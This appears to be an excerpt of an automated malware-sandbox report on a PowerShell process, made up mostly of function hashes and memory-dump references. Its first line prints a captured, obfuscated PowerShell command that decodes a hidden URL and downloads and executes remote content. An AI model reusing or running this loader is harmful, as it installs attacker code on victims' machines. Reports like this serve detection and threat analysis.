                                      Commandline:powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira)
                                      Imagebase:0x7ff788560000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Executed Functions

                                        Function 00007FFD9B971576 Relevance: 1.1, Instructions: 1062COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1804577024.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d90baa3e2de8507bf930a5e0d4e2145771751aa32ee31861a3f1d5dd96814dc0
                                        • Instruction ID: 08fba19d9329febe911776fc2636b7fe0406da940d6e9e85c5c211181c05db43
                                        • Opcode Fuzzy Hash: d90baa3e2de8507bf930a5e0d4e2145771751aa32ee31861a3f1d5dd96814dc0
                                        • Instruction Fuzzy Hash: 9C625832A1EA8D5FE7A9DB6888A55643BE1FF56304F0A01BED05DC71E3DE24AC46C341
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9B8BBFF6 Relevance: .5, Instructions: 473COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1804015491.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3b0db119a5014111888d4d5fafb49e8a60826b68dbd2165d2d6308576ccafd21
                                        • Instruction ID: b69f587fc24fe63fc3b7d01bdc2abedfcf555ee532e6b8a0f10dc657274959fb
                                        • Opcode Fuzzy Hash: 3b0db119a5014111888d4d5fafb49e8a60826b68dbd2165d2d6308576ccafd21
                                        • Instruction Fuzzy Hash: 29F1A430A08A4E8FEBA8DF28C8557F977D1FF58310F44426EE85DC7295DB3499458B82
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9B8BCDA2 Relevance: .5, Instructions: 458COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1804015491.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5df39e158eba3c51e64fc2970a0e77c042e943b3d1f28b134e5368b12b856b36
                                        • Instruction ID: d2105e8550fa4d93bf0cfd9f3df0e8e6ab869a3452ecabb1b433c6f85d7d6063
                                        • Opcode Fuzzy Hash: 5df39e158eba3c51e64fc2970a0e77c042e943b3d1f28b134e5368b12b856b36
                                        • Instruction Fuzzy Hash: E8E1C630A09A8E8FEBA8DF28C8557E977D1FF58310F04426ED84DC7295DF7899458B81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9B8A6601 Relevance: .6, Instructions: 609COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1804015491.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b148268224a8f9fcf8ca0f3c8a6809a4b1f4db9acc63a8d2e877459513454d64
                                        • Instruction ID: 20b7741382d1fe481c5431a8497cccccd1e9ced807896bcaa35f9af9ec212dc7
                                        • Opcode Fuzzy Hash: b148268224a8f9fcf8ca0f3c8a6809a4b1f4db9acc63a8d2e877459513454d64
                                        • Instruction Fuzzy Hash: EC12E570A18A4D8FDB99DF5CC4A5AA9B7F1FF98310F14416ED049C729ADA34F842CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9B974CF5 Relevance: .4, Instructions: 445COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1804577024.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 458eb0c92a357986ed4271034eeec2f3466f95d5c1cb9c06c2a1d5a6e5a27e49
                                        • Instruction ID: abfdbb17a38fcc3f42b4791fce793e2f6624bcbd73816a391ce5a41bd2ab1f9c
                                        • Opcode Fuzzy Hash: 458eb0c92a357986ed4271034eeec2f3466f95d5c1cb9c06c2a1d5a6e5a27e49
                                        • Instruction Fuzzy Hash: 96D17A31B1FA8D1FE7A597A848A1AB97BE0EF52310F1901FED09CCB1E3D918A9048351
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9B971201 Relevance: .2, Instructions: 200COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1804577024.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8700f5e51c3d695ec8d7c4fdee6f2795120783bab2e5e5f614f83dab20741d67
                                        • Instruction ID: 497e7c4ed35944d2dd04f4210961bdfa61648caef4377e349a5850c34c00609d
                                        • Opcode Fuzzy Hash: 8700f5e51c3d695ec8d7c4fdee6f2795120783bab2e5e5f614f83dab20741d67
                                        • Instruction Fuzzy Hash: B9517622F1FADA1FE3A5976818B01B47BE1EF6620470E01FBD099C71F3E908AD058381
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9B8B7215 Relevance: .1, Instructions: 125COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1804015491.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b5ad8faa11d52391e7b8349fa9e1bb4577249301fc06e5379b2f6b20e2df45ee
                                        • Instruction ID: 36830e090930c5d8fd7fc94ebfb50754ef3f657c50f5e82ddb46662bcda6bd4c
                                        • Opcode Fuzzy Hash: b5ad8faa11d52391e7b8349fa9e1bb4577249301fc06e5379b2f6b20e2df45ee
                                        • Instruction Fuzzy Hash: 34312A31A0D78C4FDB1AEBBC98656E93FE0EF56324F0541EBD049C70A3D9205909C792
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9B8B69D0 Relevance: .1, Instructions: 122COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1804015491.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a541f86b94bd67e5e69fb3a9026b7957f9ec68d70b5c009a6afc3bf7261e0ce4
                                        • Instruction ID: 3a4f729befd260de33cfd5952a2ac304327bf0534f3f65a207197529c8522fe2
                                        • Opcode Fuzzy Hash: a541f86b94bd67e5e69fb3a9026b7957f9ec68d70b5c009a6afc3bf7261e0ce4
                                        • Instruction Fuzzy Hash: 7931C57191CB4C8FDB189B5CAC066A9BBE0FBA9311F00426FE449D3252DA71A955CBC2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9B78E540 Relevance: .1, Instructions: 122COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1803564953.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd9b78d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 718db0c9ca604a846af5b52ff0590db0e8e3089438c4e00bc5eb9cdaf7fa05df
                                        • Instruction ID: f0f1390261e8e3f668b275e86da1a239f7417216f37aea774744a353ca746f68
                                        • Opcode Fuzzy Hash: 718db0c9ca604a846af5b52ff0590db0e8e3089438c4e00bc5eb9cdaf7fa05df
                                        • Instruction Fuzzy Hash: 6241263040EBC44FE7569B289C959523FF0EF52325B1A06DFD088CB1B7D729A846C792
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9B8A4E85 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1804015491.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fdd4291c7d5132a6890aee7202003ee0379eeec54b2aed1f496d26a813a8ee3a
                                        • Instruction ID: 223109d564dceea938f700eebf3623ff3ce3adda2e06e4f6ba50da4ad016b3aa
                                        • Opcode Fuzzy Hash: fdd4291c7d5132a6890aee7202003ee0379eeec54b2aed1f496d26a813a8ee3a
                                        • Instruction Fuzzy Hash: BA01A73020CB0C8FDB48EF4CE451AA5B3E0FB89320F10056DE58AC36A1D632E881CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9BB93FF2 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1808568998.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd9bb90000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 392e263e49da0a6932ba060d3eceadd697d133593e8673471781922f982fa234
                                        • Instruction ID: ff0e2d908b34db0d468a85c3c519fc2149270b7437487b6f60a3542c732e61cb
                                        • Opcode Fuzzy Hash: 392e263e49da0a6932ba060d3eceadd697d133593e8673471781922f982fa234
                                        • Instruction Fuzzy Hash: 4FF09A32B0E5098FE769EB5CE4518A877E0FF05329B1900BAE05CC74E7DA26AC01C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9B8B6CA0 Relevance: .0, Instructions: 38COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1804015491.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 64986c8d8b7698c39f1f58270d9bd5fbd8beec6d035aab8b1395c428b0eb6b73
                                        • Instruction ID: 79d8ec26c56e18003c0327f7a959a52c971468ee6169ede0cc8bd77b6eb72f10
                                        • Opcode Fuzzy Hash: 64986c8d8b7698c39f1f58270d9bd5fbd8beec6d035aab8b1395c428b0eb6b73
                                        • Instruction Fuzzy Hash: DBF02B30808A8D4FDB16DF7888258D57FB0FF16250F090297D458C71A2DB64D559CBC1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 00007FFD9B8A0E8A Relevance: 1.6, Strings: 1, Instructions: 347COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1804015491.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: =vYI
                                        • API String ID: 0-385938603
                                        • Opcode ID: c414de3f3daddf1d68f80773cc6cb6c8caa2b13fb480ee2c06a5950fb644d13f
                                        • Instruction ID: daeab9525ce1e64ac02088dcf1a97c04e30790dca5161e199262e0d41c16f225
                                        • Opcode Fuzzy Hash: c414de3f3daddf1d68f80773cc6cb6c8caa2b13fb480ee2c06a5950fb644d13f
                                        • Instruction Fuzzy Hash: 6EB1D553F0F6DA5BF76667A81C754A87F90EF2765870A01F7C0D84A0E3ED09690A8361
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9B8B32A0 Relevance: .8, Instructions: 833COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1804015491.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d0bb9ca3f30fbc9472e55dad8d5b7f144514c71a20764a632997721b615309f
                                        • Instruction ID: 9b424ab8d2acca92e1316512400976ec04dd1f73b06a7802f5af6ff48645cb87
                                        • Opcode Fuzzy Hash: 3d0bb9ca3f30fbc9472e55dad8d5b7f144514c71a20764a632997721b615309f
                                        • Instruction Fuzzy Hash: 38421053B0F6E20BE32A67BC7C650F96F51EF8636471901FBD0984A1FBA819690687C1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9B8B3570 Relevance: .5, Instructions: 500COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1804015491.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4d5f4b53ad92e45d3ff352a55fd8867347273406464bc141c2309570138fd12f
                                        • Instruction ID: f2d5efac4ef5b3641bbfd846bf3de4f19027bde810bd8ea11676a394d468f476
                                        • Opcode Fuzzy Hash: 4d5f4b53ad92e45d3ff352a55fd8867347273406464bc141c2309570138fd12f
                                        • Instruction Fuzzy Hash: 5CE17A93B0E6B246E31A77FC7C6A4F92B40DF8637870841FBD09C4A0EBAC48654796C5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9B8C05F5 Relevance: 7.8, Strings: 6, Instructions: 253COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1804015491.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: <K_^$=K_^$>K_^$K_^$K_^$K_^
                                        • API String ID: 0-2522049516
                                        • Opcode ID: 14a7cdc9ddd933b404c71ae609840128c6e271faa951ce48d2a34a200d71103c
                                        • Instruction ID: 7d453e98a78bce0063e3dc05932d75a7e3b0546acd4af6d48091958bccbfa837
                                        • Opcode Fuzzy Hash: 14a7cdc9ddd933b404c71ae609840128c6e271faa951ce48d2a34a200d71103c
                                        • Instruction Fuzzy Hash: 98817693A1F7EA5AE72767A868B54F82F60DF5699871F01F7C0D88F0E3DC0829478251
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9B8C06F2 Relevance: 6.4, Strings: 5, Instructions: 143COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1804015491.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: =K_^$K_^$K_^$K_^$K_^
                                        • API String ID: 0-665119580
                                        • Opcode ID: 6231d5a6b8c86498353ba05d0a67db3a8cf5576738623fc3ec507ff0a2df995a
                                        • Instruction ID: b71ec0bec6b5751ca37b89010f6b0fc3f4c15bf3d3716184b62f882858563371
                                        • Opcode Fuzzy Hash: 6231d5a6b8c86498353ba05d0a67db3a8cf5576738623fc3ec507ff0a2df995a
                                        • Instruction Fuzzy Hash: 694185D3A1F6EB5AF76667A858B50F82F90EF16AD472F41F3C0D48E0A3DC042A474651
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00007FFD9B8B873A Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1804015491.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: K_^$K_^$K_^$K_^
                                        • API String ID: 0-4267328068
                                        • Opcode ID: 8b88d9c533bab6460131b0dd63243eafd06a07df43d1f07020dfceca03fa8776
                                        • Instruction ID: 7f8ecc09f34085e45c3a2a03c30d341ab019da90aa412b8941ab89cbea29d48b
                                        • Opcode Fuzzy Hash: 8b88d9c533bab6460131b0dd63243eafd06a07df43d1f07020dfceca03fa8776
                                        • Instruction Fuzzy Hash: 6401A9D3D0E6EE4BD777526918B80E46B90EE6536CB0B00F3C9989F2A7FC141D074681
                                        Uniqueness

                                        Uniqueness Score: -1.00%